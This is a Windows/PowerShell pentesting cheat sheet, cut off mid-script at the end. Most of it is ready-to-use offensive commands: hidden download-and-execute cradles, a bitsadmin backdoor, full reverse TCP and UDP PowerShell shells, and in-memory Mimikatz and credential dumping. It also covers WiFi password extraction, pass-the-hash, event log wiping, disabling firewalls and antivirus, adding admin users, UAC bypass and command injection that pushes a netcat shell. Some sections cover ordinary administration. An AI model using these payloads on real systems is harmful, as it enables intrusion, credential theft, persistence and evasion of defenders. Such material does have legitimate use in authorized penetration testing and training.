Link to this headingWindows Commands

Integrate Linux Commands into Windows with PowerShell and the Windows Subsystem for Linux

Collection Of Powershell Scripts with Framework for Pentesting
SHiPS based provider to navigate CIM classes and namespaces

Hidden WIFI backdoor:

netsh wlan set hostednetwork mode=[allow\|disallow] netsh wlan set hostednetwork ssid=<ssid> key=<password> keyUsage=persistent\|temporary netsh wlan [start|stop] hostednetwork

Allow program/service/port through Firewall:

netsh firewall set service type = remotedesktop mode = enable netsh firewall add allowedprogram C:\nltest.exe mltest enable netsh firewall add portopening tcp 2482 lt enable all

Tunnel Traffic Natively with Windows:

netsh int portproxy v4tov4 listenport=80 connecthost=[AttackerIP] connectport=80

List other shares:

net view \\fileserv /all

Powershell Downloader:

powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://[domainname|IP]:[port]/[file]'))"

Download and run program:

powershell (new-object System.Net.WebClient).DownloadFile('http://rmccurdy.com/scripts/quickvnc.exe','%TEMP%\quickvnc.exe');Start-Process "%TEMP%\quickvnc.exe"

Wipe Event logs:

powershell -command " wevtutil el | Foreach-Object {Write-Host 'Clearing $_'; wevtutil cl '$_'}"

Get external IP:

powershell -command "$(Resolve-DnsName -Name myip.opendns.com -Server 208.67.222.220).IPAddress

Link to this headingBitsadmin Download/Exec

Make the backdoor:

bitsadmin /create backdoor bitsadmin /addfile backdoor http://192.168.20.10/theshell.exe C:\windows\temp\theshell.exe bitsadmin /SETMINRETRYDELAY 88000 bitsadmin /SETNOTIFYCMDLINE backdoor C:\windows\temp\theshell.exe NULL

Check the backdoor is set up correctly:

bitsadmin /getnotifycmdline backdoor bitsadmin /listfiles backdoor

Run the backdoor:

bitsadmin /RESUME backdoor

Link to this headingWMI Commands

Spot Odd Executables - wmic PROCESS WHERE "NOT ExecutablePath LIKE '%Windows%'" GET ExecutablePath Look at services that are set to start automatically - wmic SERVICE WHERE StartMode="Auto" GET Name, State Find user-created shares (usually not hidden) - wmic SHARE WHERE "NOT Name LIKE '%$'" GET Name, Path Find stuff that starts on boot - wmic STARTUP GET Caption, Command, User Identify any local system accounts that are enabled (guest, etc.) - wmic USERACCOUNT WHERE "Disabled=0 AND LocalAccount=1" GET Name" Change Start Mode of Service - wmic service where (name like "Fax" OR name like "Alerter") CALL ChangeStartMode Disabled Number of Logons Per USERID - wmic netlogin where (name like "%skodo") get numberoflogons Obtain a Certain Kind of Event from Eventlog - wmic ntevent where (message like "%logon%") list brief Clear the Eventlog (Security example) - wmic nteventlog where (description like "%secevent%") call cleareventlog Get Mac Address - wmic nic get macaddress Reboot or Shutdown - wmic os where buildnumber="2600" call reboot Update static IP address - wmic nicconfig where index=9 call enablestatic("192.168.16.4"), ("255.255.255.0") Change network gateway - wmic nicconfig where index=9 call setgateways("192.168.16.4", "192.168.16.5"),(1,2) Enable DHCP - wmic nicconfig where index=9 call enabledhcp Service Management - wmic service where caption="DHCP Client" call changestartmode "Disabled" Start an Application - wmic process call create "calc.exe" Terminate an Application - wmic process where name="calc.exe" call terminate Change Process Priority - wmic process where name="explorer.exe" call setpriority 64 Get List of Process Identifiers - wmic process where (Name='svchost.exe') get name,processid Information About Harddrives - wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber Information about os - wmic os get bootdevice, buildnumber, caption, freespaceinpagingfiles, installdate, name, systemdrive, windowsdirectory /format:htable > c:osinfo.htm Information about files - wmic path cim_datafile where "Path='windowssystem32wbem' and FileSize>1784088" > c:wbemfiles.txt Process list - wmic process get /format:htable > c:process.htm Retrieve list of warning and error events not from system or security logs - WMIC NTEVENT WHERE "EventType<3 AND LogFile != 'System' AND LogFile != 'Security'" GET LogFile, SourceName, EventType, Message, TimeGenerated /FORMAT:"htable.xsl":" datatype = number":" sortby = EventType" > c:appevent.htm Total Hard Drive Space Check - wmic LOGICALDISK LIST BRIEF Get Running Services Information - Wmic service where (state=”running”) get caption, name, startmode, state Get Startmode of Services - Wmic service get caption, name, startmode, state Get Domain Names And When Account PWD set to Expire - WMIC UserAccount GET name,PasswordExpires /Value Get Hotfix and Security Patch Information - WMIC QFE GET /format:CSV >QFE.CSV Get Startup List - wmic startup list full Find a specific Process - wmic process list brief - find "cmd.exe" Get List of IP Interfaces - wmic nicconfig where IPEnabled='true' Change IP Address - wmic nicconfig where Index=1 call EnableStatic ("10.10.10.10"), ("255.255.255.0") OS/System Report HTML Formatted - wmic /output:c:os.html os get /format:hform Products/Programs Installed Report HTML Formatted - wmic /output:c:product.html product get /format:hform Services Report on a Remote Machine HTML Formatted - wmic /output:c:services.htm /node:server1 service list full / format:htable Turn on Remoted Desktop Remotely! - Wmic /node:"servername" /user:"user@domain" /password: "password" RDToggle where ServerName="server name" call SetAllowTSConnections 1 Get Server Drive Space Usage Remotely - WMIC /Node:%%A LogicalDisk Where DriveType="3" Get DeviceID,FileSystem,FreeSpace,Size /Format:csv MORE /E +2 >> SRVSPACE.CSV Get PC Serial Number - wmic /node:”HOST” bios get serialnumber Get PC Product Number - wmic /node:”HOST” baseboard get product Get Services for Remote Machine in HTML Format - wmic /output:c:services.htm /node:server1 service list full / format:htable

Link to this headingSearch for Stored Credentials

Metasploit Framework enum_unattend module and gather credentials module:

type c:\sysprep.inf type c:\sysprep\sysprep.xml dir c:\*vnc.ini /s /b dir c:\*ultravnc.ini /s /b dir c:\ /s /b | findstr /si *vnc.ini findstr /S pass *.txt *.xml *.ini // in C:\ #find out what groups a user is part of net user <userName> /domain | find "Group"

Link to this headingUsers and Permissions

Add a user on windows:
net user $username $password /add

Add a user to the “Remote Desktop Users” group:
net localgroup "Remote Desktop Users" $username /add

Make a user an administrator:
net localgroup administrators $username /add

Link to this headingNetwork

Disable Windows firewall on newer versions:
NetSh Advfirewall set allprofiles state off

Disable windows firewall on older windows:
netsh firewall set opmode disable

Port forwarding to remote host:

netsh interface portproxy add v4tov4 listenport=<LPORT> listenaddress=0.0.0.0 connectport=<RPORT> connectaddress=<RHOST>

Wireless Backdoor Creation:

netsh wlan set hostednetwork mode=[allow\|disallow] netsh wlan set hostednetwork ssid=<ssid> key=<passphrase> keyUsage=persistent\|temporary netsh wlan [start|stop] hostednetwork

Dump DNS Zones:

Get-DnsRecord -RecordType A -ZoneName FQDN -Server ServerName | % {Add-Content -Value $_ -Path filename.txt} Get-WmiObject -Namespace Root\MicrosoftDNS -Query "SELECT * FROM MicrosoftDNS_AType WHERE ContainerName='domain.com'"

Link to this headingPass the Hash Windows

pth-winexe -U alice%aad3b435b51404eeaad3b435b51404ee:B74242F37E47371AFF835A6EBCAC4FFE //10.11.1.49 cmd.exe

after % starts the password
“aad3b435b51404eeaad3b435b51404ee” is the blank LM hash

Pass the Hash
wmiexec.exe -hashes aad3b435b51404eeaad3b435b51404ee:B74242F37E47371AFF835A6EBCAC4FFE alice@localhost

Exec commands on remote Windows machine
PsExec.exe \\10.11.1.49 -u alice -p somepasswd cmd

get a file from Kali to the remote Windows machine
TFTP.EXE -i 10.11.1.49 get PsExec64.exe

remote port forwarding from Windows -> Kali
plink.exe -l root -pw Parolaroot -R 445:127.0.0.1:445

Redirect port with plink.exe
plink -P 22 -l root -pw some_password -C -R 445:127.0.0.1:445 192.168.12.185 ##redirects the Windows port 445 to Kali on port 22

Link to this headingSYSINTERNALS

use the -accepteula to avoid the GUI asking to accept…EULA
PsExec.exe –accepteula

PsExec64.exe -accepteula \\10.11.1.49 -u user -p somepassword cmd

powershell -ExecutionPolicy Bypass C:\Users\Public\PsExec.exe -accepteula \\localhost -u alice -p XXXX cmd

  • PsExec - execute processes remotely
  • PsFile - shows files opened remotely
  • PsGetSid - display the SID of a computer or a user
  • PsInfo - list information about a system
  • PsPing - measure network performance
  • PsKill - kill processes by name or process ID
  • PsList - list detailed information about processes
  • PsLoggedOn - see who’s logged on locally and via resource sharing (full source is included)
  • PsLogList - dump event log records
  • PsPasswd - changes account passwords
  • PsService - view and control services
  • PsShutdown - shuts down and optionally reboots a computer
  • PsSuspend - suspends processes
  • PsUptime - shows you how long a system has been running since its last reboot (PsUptime’s functionality has been incorporated into PsInfo)

Link to this headingWindows Persistance

Add Windows user:
net user /add hacker 1234567

Add user to Administrators groups
net localgroup administrators /add hacker

Add user to Remote Desktop user group
net localgroup "Remote Desktop users" hacker /add

Start Remote Desktop service
net start TermService

Is Remote Desktop Service running?
tasklist /svc | findstr /C:TermService

Permanently enable Terminal Services
sc config TermService start=auto

Enable Terminal services through registry // reboot after
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

Link to this headingDLL Injection

Run Custom DLL

rundll32 shell32.dll,Control_RunDLL C:\Users\pentestlab.dll

Run CMD when disabled
rundll32 C:\cmd.dll,EntryPoint
rundll32 shell32.dll,Control_RunDLL C:\cmd.dll

Run Regedit
rundll32 C:\regedit.dll,EntryPoint
rundll32 shell32.dll,Control_RunDLL C:\regedit.dll

Inject DLL in to running process
Remote DLL Injector

RemoteFLLInjector64.exe <ProcessID> <DLL file>

Using Powersploit
Invoke-DLLInjection -ProcessID <ProcessID> -Dll <DLLfile>

Using Windows Exec
Mavinject32.exe <PID> /INJECTRUNNING <DLL PATH>
Mavinject64.exe <PID> /INJECTRUNNING <DLL PATH>
Mavinject.exe <PID> /INJECTRUNNING <DLL PATH>

IstallUtil.exe /U <DLL PATH>

Link to this headingUAC Bypass

Bypass with Windows Installer (Removed in Windows 10)
makecab C:\Some\Evil.dll C:\Some\Suspicious.cab
wusa C:\Some\Suspicious.cab /extract:C:\Windows\Some\Path

Bypass with IFileOperation COM Object

IFileOperation.MoveItem ("C:\Some\Source.file","C:\Some\Destination\Path\","Destination.file") IFileOperation.PerformOperations()

UAC Bypass Workshop PDF

More Bypasses

Link to this headingBinary Information

Which programs have auto Elevate privlages
Get-Content -Path C:\Windows\System32\Taskmgr.exe |Select-String -Pattern "autoElevate"

View all in folder
Get-AutoElevate-Path C:\Windows\system32 -MaxDepth 1

Link to this headingDomain Information

Finding the Domain Controler:
echo %LOGONSERVER%.
nltest /dclist, nslookup -q=srv _kerberos._tcp (domain suffix can autocomplete)

Link to this headingSetting up a Domain Server

Install Active Directory:

Install-WindowsFeature -name AD-Domain-Services -IncludeManagementTools

Create a new Active Directory Domain:

Import-Module ADDSDeployment #Initiate the new Active Directory: Install-ADDSForest -CreateDnsDelegation:$false -DatabasePath "C:\Windows\NTDS" -DomainMode "Win2012R2" ` -DomainName "raymii.nl" -DomainNetbiosName "RAYMII" -ForestMode "Win2012R2" -InstallDns:$true ` -LogPath "C:\Windows\NTDS" -NoRebootOnCompletion:$false -SysvolPath "C:\Windows\SYSVOL" -Force:$true

Add a server to a domain:

#First test the existing domain to make sure you can join: Test-ADDSForestInstallation -DomainName raymii.nl #Add the server to the domain as a backup domain controller: Install-ADDSDomainController -InstallDns -Credential (Get-Credential RAYMII\Administrator) -DomainName raymii.nl

Create an Active Directory user account:

New-ADUser -Name "John Doe" -GivenName John -Surname Doe ` -SamAccountName jdoe -UserPrincipalName jdoe@craymii.nl ` -AccountPassword (Read-Host -AsSecureString "hunter2") ` -PassThru | Enable-ADAccount

Create an Active Directory group:

#Use the below command to create a new global group in the default Users folder of Active Directory called "Managers": New-ADGroup -name "Managers" -groupscope Global #If it needs to exist in different path in Active Directory, specify the path by its distinguished name: New-ADGroup -name "Managers" -groupscope Global -path "OU=OtherOU,DC=Raymii,DC=nl"

Add user to a group:

#The below command adds the user jdoe to the Managers group: Add-ADGroupMember -Identity "Managers" -Member "jdoe" #To add a user in a different OU to a group in a different OU, you can specify the full DN: Add-ADGroupMember -Identity "CN=SupportSlavesGroup,OU=SupportSlaves,DC=raymii,DC=nl" -Members "CN=jdoe,OU=OtherUserOU,DC=raymii,DC=nl"

Install Microsoft Exchange 2013:

#Install the RSAT-DSS role via Powershell: Install-WindowsFeature RSAT-ADDS #We prepare the forest for the instalation of Exchange. First the Schema: setup /ps /IAcceptExchangeServerLicenseTerms #The Active Directory: setup /PrepareAD /OrganizationName:"Raymii" /IAcceptExchangeServerLicenseTerms #The Domain itself: setup /pd /IAcceptExchangeServerLicenseTerms #Install other required components and features for Exchange: Install-WindowsFeature AS-HTTP-Activation, Desktop-Experience, NET-Framework-45-Features, RPC-over-HTTP-proxy, RSAT-Clustering, RSAT-Clustering-CmdInterface, WAS-Process-Model, Web-Asp-Net45, Web-Basic-Auth, Web-Client-Auth, Web-Digest-Auth, Web-Dir-Browsing, Web-Dyn-Compression, Web-Http-Errors, Web-Http-Logging, Web-Http-Redirect, Web-Http-Tracing, Web-ISAPI-Ext, Web-ISAPI-Filter, Web-Lgcy-Mgmt-Console, Web-Metabase, Web-Mgmt-Console, Web-Mgmt-Service, Web-Net-Ext45, Web-Request-Monitor, Web-Server, Web-Stat-Compression, Web-Static-Content, Web-Windows-Auth, Web-WMI, Windows-Identity-Foundation #You need to download and install the following setups manually from the Microsoft website and install them in the order listed below: # Unified Communications Managed API 4.0 Runtime # Microsoft Office 2010 Filter Pack 64 bit # Microsoft Office 2010 Filter Pack SP1 64 bit #Start the actual Exchange installation: setup /m:Install /Roles:ca,mb,mt /IAcceptExchangeServerLicenseTerms /InstallWindowsComponents /DBFilePath:"E:\EXCHANGE\MDB001.edb" /LogFolderPath:"E:\EXCHANGE" /MdbName:"MDB001"

Link to this headingWebDL and execute

powershell -ExecutionPolicy Bypass -noLogo -Command Import-Module BitsTransfer;Start-BitsTransfer [http://www.illmob.org/test.exe](http://www.illmob.org/test.exe) test.exe;./test.exe;
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('[http://illmob.org/test.exe','test.exe');./test.exe](http://illmob.org/test.exe','test.exe');./test.exe);
powershell -ExecutionPolicy Bypass -noLogo -Command Invoke-Expression (New-Object Net.WebClient).DownloadString('[http://bit.ly/L3g1t'](http://bit.ly/L3g1t'))

Link to this headingReverse TCP Shell

$client = New-Object System.Net.Sockets.TCPClient("**192.168.1.100**",**4444**);$stream = $client.GetStream();\[byte\[\]\]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = (\[text.encoding\]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Link to this headingReverse UDP Shell

$endpoint = New-Object System.Net.IPEndPoint (\[System.Net.IPAddress\]::Parse("**192.168.1.100**"),53);$client = New-Object System.Net.Sockets.UDPClient(53);\[byte\[\]\]$bytes = 0..65535|%{0};$sendbytes = (\[text.encoding\]::ASCII).GetBytes('PS> ');$client.Send($sendbytes,$sendbytes.Length,$endpoint);while($true){;$receivebytes = $client.Receive(\[ref\]$endpoint);$returndata = (\[text.encoding\]::ASCII).GetString($receivebytes);$sendback = (iex $returndata 2>&1 | Out-String );$sendbytes = (\[text.encoding\]::ASCII).GetBytes($sendback);$client.Send($sendbytes,$sendbytes.Length,$endpoint)};$client.Close()

Link to this headingWebDL and execute mimikatz totally in memory

Uses Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory to dump credentials without ever writing the mimikatz binary to disk. Dump all domain creds with mimikatz

powershell "IEX (New-Object Net.WebClient).DownloadString('[http://is.gd/oeoFuI'](http://is.gd/oeoFuI')); Invoke-Mimikatz -DumpCreds"

This Invoke-Mimikatz.cs.ps1 Invokes x86 or x64 Mimiktaz Inside of PowerShell Process

powershell "IEX (New-Object Net.WebClient).DownloadString('[http://is.gd/BD2toB'](http://is.gd/BD2toB')); Invoke-Mimikatz -DumpCreds"

Link to this headingWebDL and execute hashdump totally in memory

Hashes are dumped using a modified version of powerdump script from MSF written by David Kennedy. Administrator privileges are required for this script

powershell "IEX (New-Object Net.WebClient).DownloadString('[http://is.gd/MHa1Bj'](http://is.gd/MHa1Bj')); Get-PassHashes"

Link to this headingWebDL and execute Get-VaultCredential totally in memory

Get-VaultCredential enumerates and displays all credentials stored in the Windows vault. Web credentials, specifically are displayed in cleartext.

powershell "IEX (New-Object Net.WebClient).DownloadString('[http://is.gd/57uScy'](http://is.gd/57uScy')); Get-VaultCredential"

Link to this headingWebDL and execute LSA Secrets totally in memory

Extracts LSA secrets from HKLM:\\SECURITY\Policy\Secrets\ on a local computer. The payload must be run with elevated permissions, in 32-bit mode and requires permissions to the security key in HKLM. The permission could be obtained by using Enable-DuplicateToken payload.

powershell "IEX (New-Object Net.WebClient).DownloadString('[http://is.gd/qhgsX1'](http://is.gd/qhgsX1'));"

Link to this headingDump stored Autologon password

Get-ItemProperty -Path 'HKLM:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon' | select defaultusername,defaultpassword

Link to this headingDump WIFI Passwords

$wlans = netsh wlan show profiles | Select-String -Pattern "All User Profile" | Foreach-Object {$\_.ToString()} $exportdata = $wlans | Foreach-Object {$\_.Replace(" All User Profile : ",$null)} $exportdata | ForEach-Object {netsh wlan show profiles name="$\_" key=clear}
(netsh wlan show profiles) | Select-String "\\:(.+)$" | %{$name=$\_.Matches.Groups\[1\].Value.Trim(); $\_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\\W+\\:(.+)$" | %{$pass=$\_.Matches.Groups\[1\].Value.Trim(); $\_} | %{\[PSCustomObject\]@{ PROFILE\_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize
(netsh wlan show profiles) | Select-String "\\:(.+)$" | %{$name=$\_.Matches | % {$\_.Groups\[1\].Value.Trim()}; $\_} |%{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\\W+\\:(.+)$" | %{$pass=$\_.Matches | % {$\_.Groups\[1\].Value.Trim()}; $\_} | %{\[PSCustomObject\]@{ PROFILE\_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize
foreach($profil in (netsh wlan show profiles | Select-String ':')){foreach($line in (netsh wlan show profiles name=($profil.toString().split(':')\[1\].trim()) key=clear)){$line+';'}};

Link to this headingSID2USER

((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-19")).translate(\[System.Security.Principal.NTAccount\])).value

Link to this headingUSERS2SID & Last Logon

gwmi win32\_userprofile | select -unique @{name="Name";expression={$\_.\_\_server}},@{name="SID";expression={$\_.sid}},@{name="LastUseTime";expression={$\_.converttodatetime($\_.lastusetime)}},localpath | ft -auto

Link to this headingQuery Domain Admins

Get-ADGroupMember -Credential $cred -server pwnt.com "Domain Admins"

Link to this headingQuery Process/Service

gps | ?{$\_.name -match "<process/service name>"} | ?{$\_.id -match "<process/service id>"} | select \*

Link to this headingQuery Drives

[System.IO.DriveInfo]::GetDrives()

Link to this headingWEbInject callback

127.0.0.1 | powershell.exe (new-object System.Net.WebClient).Downloadfile('[http://192.168.1.107/nc.exe'](http://192.168.1.107/nc.exe'), 'nc.exe')

Then, once the command completed, I set up a netcat listener on my attacker machine and issued a second command to the web application to push a shell back to my attacker machine via netcat:

127.0.0.1 | nc.exe -e cmd.exe 192.168.1.107 21

Link to this headingPort Scan

PS C:\\> 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.10.10.10",$\_)) "Port $\_ is open!"} 2>$null

Link to this headingPing Sweep

PS C:\\> 1..255 | % {echo "10.10.10.$\_"; ping -n 1 -w 100 10.10.10.$\_ | SelectString ttl}

Link to this headingFind Files

PS C:\\> Get-ChildItem "C:\\Users\\" - recurse -include \*passwords\*.txt

Link to this headingText 2 Speech

powershell (New-Object -ComObject Sapi.SpVoice).Speak(('All Your Base R Belong To Us.'))

Other Resources: Nishang Github

Link to this headingDownload Cradles

from https://gist.github.com/HarmJ0y/bb48307ffa663256e239

# 1. normal download cradle IEX (New-Object Net.Webclient).downloadstring("[http://EVIL/evil.ps1](http://EVIL/evil.ps1)") # 2. PowerShell 3.0+ IEX (iwr '[http://EVIL/evil.ps1'](http://EVIL/evil.ps1')) # 3. hidden IE com object $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('[http://EVIL/evil.ps1');start-sleep](http://EVIL/evil.ps1');start-sleep) -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r # 4. Msxml2.XMLHTTP COM object $h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','[http://EVIL/evil.ps1',$false);$h.send();iex](http://EVIL/evil.ps1',$false);$h.send();iex) $h.responseText # 5. WinHttp COM object (not proxy aware!) $h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','[http://EVIL/evil.ps1',$false);$h.send();iex](http://EVIL/evil.ps1',$false);$h.send();iex) $h.responseText # 6. using bitstransfer- touches disk! Import-Module bitstransfer;Start-BitsTransfer '[http://EVIL/evil.ps1'](http://EVIL/evil.ps1') $env:temp\\t;$r=gc $env:temp\\t;rm $env:temp\\t; iex $r # 7. DNS TXT approach from PowerBreach ([https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1](https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1)) # 8. code to execute needs to be a base64 encoded string stored in a TXT record IEX (\[System.Text.Encoding\]::UTF8.GetString(\[System.Convert\]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"\*"') -split '"'\[0\])))) # 9. from @subtee - [https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d](https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d)
<# <?xml version="1.0"?> <command> <a> <execute>Get-Process</execute> </a> </command> #> $a = New-Object System.Xml.XmlDocument $a.Load("[https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt](https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt)") $a.command.a.execute | iex

Link to this headingUsing Microsoft’s SyncAppvPublishingServer to download and execute a PowerShell file!

SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('{}') | IEX

Link to this headingPassing msi file url to the Windows installer will download and execute it!

msiexec /i {}

Link to this headingWindows Remote Management provides the ability to remotely execute wmi commands.

winrm qc -q & winrm i c wmicimv2/Win32_Process @{CommandLine="{your_command_here}"}

Link to this headingUses certutil to download your base64 encoded dll file like a txt file to avoid suspicion.

certutil -urlcache -split -f {} google_https_cert.txt && certutil -decode google_https_cert.txt https_cert.dll && regsvr32 /s /u https_cert.dll

Link to this headingUses certutil to download your exe file like a cert file to avoid suspicion.

certutil.exe -urlcache -split -f {} google_https_cert.exe && google_https_cert.exe

Link to this headingUsing windows’s control panel to load a dll file!

control.exe {your_dll_file}

Link to this headingUsing the .NET compiler to compile a c# payload locally that can then be executed.

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:payload.exe {your_cs_file_here}

Link to this headingUses forfiles to execute commands without using cmd.

forfiles /p c:\windows\system32 /m notepad.exe /c {Here_your_command}

Link to this headingUses mshta command to download and execute your hta file.

mshta {}

Link to this headingUsing microsoft’s office word to load a dll file!

winword /l {your_dll_file}

Link to this headingUsing rundll32.exe to download and execute a PowerShell file.

rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('{}');"

Link to this headingSearch for vulnerable service privilege opportunities using script from PowerTools

Powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks

Link to this headingPowerVeiw and output localy to disk for beacon:

powershell -no -exec bypass -command "& {Import-Module .\PowerView.ps1; Invoke-UserHunter USRNAME | Out-File -Encoding Ascii USERNAME.txt}"

Link to this headingPowerview UserHunting Search by keyword:

powershell Get-NetUser -Filter "(description=*medical*)" | Select-Object -Prop samaccountname.description,title powershell Get-NetUser -Filter "(title=*medical*)" | Select-Object -Prop samaccountname.description,title

Link to this headingSimple Web request:

powershell.exe -w hidden -command $wc = New-Object System.Net.Webclient; $wc.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64;Trident/7.0; AS; rv:11.0) Like Gecko'); $wc.proxy= [System.Net.WebRequest]::DefaultWebProxy; $wc.proxy.credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; $wc.downloadstring('http://google.com/')

Link to this headingList Chrome bookmarks with one line:

type "C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"

Link to this headinglist all unquoted service paths

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

Link to this headingFirewall

netsh advfirewall show state netsh advfirewall show config netsh advfirewall set allprofiles state off netsh advfirewall firewall add rule name="Exploit" dir=in action=allow program="C:\\exploit.exe" enable=yes netsh firewall add portopening tcp 2482 lt enable all

Link to this headingServices

schtasks /query /fo LIST /v tasklist /SVC sc qc Spooler

Link to this headingEnable RDP

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG\_DWORD /d 0 /f

Link to this headingAdd Admin User

net user \[username\] \[password\] /add net localgroup administrators \[username\] /add

Link to this headingDump WIFI passwords to .xml

netsh wlan export profile key=clear

Link to this headingDump WIFI SSID/Password oneliner

@echo off & for /f "tokens=1\*delims=:" %a in ('netsh wlan show profiles') do (for /f "tokens=\*" %c in ("%~b") do netsh wlan show profile name=%c key=clear) | findstr /c:"Key Content" /c:"SSID name"

Link to this headingOS Name and Version

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Link to this headingTransfer File from FTP

echo user USERNAME >>c:\\$.tmp && echo PASS >>c:\\$.tmp && echo binary >>c:\\$.tmp && echo get test.exe >>c:\\$.tmp && echo quit >>c:\\$.tmp && ftp -v -i -n -s:c:\\$.tmp ftp.blah.com c:\\$$.tmp && start c:\\test.exe && del c:\\$.tmp && del c:\\$$.tmp

Link to this headingTransfer File from TFTP

tftp -i yourserver.com get yourfile.exe && start yourfile.exe

Link to this headingTransfer File from ADODB STREAM FILES

echo Dim HTTPGET >>c:\\dl.vbs && echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>c:\\dl.vbs && echo HTTPGET.Open "GET", "[http://www.illmob.org/test.exe](http://www.illmob.org/test.exe)", false >>c:\\dl.vbs && echo HTTPGET.Send >>c:\\dl.vbs && echo DataBin = HTTPGET.ResponseBody >>c:\\dl.vbs && echo Const adTypeBinary=1 >>c:\\dl.vbs && echo Const adSaveCreateOverWrite=2 >>c:\\dl.vbs && echo Dim SendBinary >>c:\\dl.vbs && echo Set SendBinary = CreateObject("ADODB.Stream") >>c:\\dl.vbs && echo SendBinary.Type = adTypeBinary >>c:\\dl.vbs && echo SendBinary.Open >>c:\\dl.vbs && echo SendBinary.Write DataBin >>c:\\dl.vbs && echo SendBinary.SaveToFile "c:\\test.exe", adSaveCreateOverWrite >>c:\\dl.vbs && cscript //Nologo /B c:\\dl.vbs && start c:\\test.exe && del /s c:\\dl.vbs

re-enable ADODB stream if patched

echo Windows Registry Editor Version 5.00 >>c:\\fix.reg && echo \[HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{00000566-0000-0010-8000-00AA006D2EA4}\] >>c:\\fix.reg && echo "Compatibility Flags"=- >>c:\\fix.reg && regedit /s c:\\fix.reg

Link to this headingWebDL using CertUtil

certutil -urlcache -split -f [http://illmob.org/test.exe](http://illmob.org/test.exe) && start yourfile.exe

Link to this headingMount Windows Share with Null Session

net use x: \\\\server\\share "" /u:

Link to this headingDisable Symantec Endpoint Protection

c:\\program files\\symantec\\symantec endpoint protection\\smc -stop

Link to this headingAT Command Execution

at \\[remote host name or IP address] 12:00 cmd /c "C:\windows\temp\mal.exe"
schtasks /create /tn rb /tr "c:\\EVIL.cmd" /sc minute /mo 1 /ru Administrator /rp p455w0rd && schtasks /change /tn rb /ru ""

Link to this headingRun external Windows Script Component (pops calc.exe)

regsvr32 /s /n /u /i:[http://bit.ly/1S8dRjL](http://bit.ly/1S8dRjL) scrobj.dll

Link to this headingRun Sysinternals programs

pushd \\live.sysinternals.com && autoruns /accepteula && pause && popd

Link to this headingFind unquoted service paths without access to wmic. Need to run both of these to catch services with spaces in their names:

for /f "tokens=2" %i in ('sc query ^|findstr "SERVICE\_NAME"') do sc qc %i | findstr "BINARY\_PATH\_NAME" >> output.txt for /f "tokens=2\*" %i in ('sc query ^|findstr "SERVICE\_NAME"') do sc qc "%i %j" | findstr "BINARY\_PATH\_NAME" >> output.txt

Link to this headingBatterUp.bat

Check permissions on services @echo off REM Batch port of selected modules from PowerUp by harmj0y REM Author: @\_wald0 SETLOCAL ENABLEDELAYEDEXPANSION REM ====================================== REM = Find unquoted service binary paths = REM ====================================== echo( echo Finding unquoted service binary paths... echo( for /f "tokens=2\* delims=:" %%i in ('sc query ^|findstr "SERVICE\_NAME"') do ( set str=%%i set str=!str:~1! sc qc "!str!" | findstr "BINARY\_PATH\_NAME" | findstr /iv "c:\\windows\\\\" | findstr /iv """ ) REM ======================================================================== REM = Check permissions on services = REM = Technique stolen from PowerUp by harmj0y = REM = https://github.com/HarmJ0y/PowerUp/blob/master/PowerUp.ps1#L104-L141 = REM ======================================================================== echo( echo Finding service binaries your user has write access to... echo( for /f "tokens=2\* delims=:" %%i in ('sc query ^|findstr "SERVICE\_NAME"') do ( set str=%%i set str=!str:~1! for /f "tokens=4" %%e in 